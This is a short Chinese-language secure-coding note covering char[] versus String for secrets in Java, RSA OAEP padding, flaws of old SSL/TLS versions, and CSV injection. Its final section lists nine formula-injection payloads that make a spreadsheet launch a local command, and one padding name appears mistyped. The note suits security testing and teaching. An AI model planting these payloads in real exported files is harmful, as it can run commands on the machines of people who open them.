Java開發(fā)使用char[]代替String保存敏感數(shù)據(jù)

Java Jvm會(huì)提供內(nèi)存轉(zhuǎn)儲(chǔ)功能，當(dāng)Java程序dump后，會(huì)生成堆內(nèi)存的快照，保存在.hprof后綴的文件中，進(jìn)而導(dǎo)致敏感信息的泄露。char[]可以在存儲(chǔ)敏感數(shù)據(jù)后手動(dòng)清零，String對(duì)象會(huì)永久保存數(shù)據(jù)，即便被置為空也會(huì)保存在內(nèi)存中，知道垃圾回收機(jī)制將其回收。

加密算法的填充

應(yīng)該使用OAEP模式而不應(yīng)該使用PKCS1模式。
通常寫法如下：

RSA/ECB/OAEPWithSHA-1AndGF1Padding
RSA/ECB/OAEPWithSHA-1AndMGFPadding
RSA/ECB/PKCS1Padding(禁用)

不安全協(xié)議/加密套件

1. SSL/TLS版本：
   • SSL(2.0/3.0) 也可以稱為SSLv2/SSLv3
   • TLS(1.0/1.1/1.2/1.3)也可以稱TLSv1/TLSv1.1/TLSv1.2/TLSv1.3
2. 存在的問題
   • SSL2.0
     • 使用MD5作為消息認(rèn)證碼
     • 握手消息未受保護(hù)
     • 加密和消息認(rèn)證使用相同的密鑰
   • SSL3.0
     • 數(shù)據(jù)記錄協(xié)議受到POODLE攻擊
     • 密鑰交換時(shí)易受中間人攻擊
   • TLS1.0
     • 對(duì)稱加密僅支持RC4和CBC模式

CSV注入

可以使用的payload

=cmd|'/c calc'!A1
+=cmd|'/c calc'!A1
\",=cmd|'/c calc'!A1
",=cmd|'/c calc'!A1
@ABS(cmd|'/c calc'!A1)
-cmd|'/c calc'!A1
xxx, =cmd|'/c calc'!A1
xxx\n =cmd|'/c calc'!A1
xxx;=cmd|'/c calc'!A1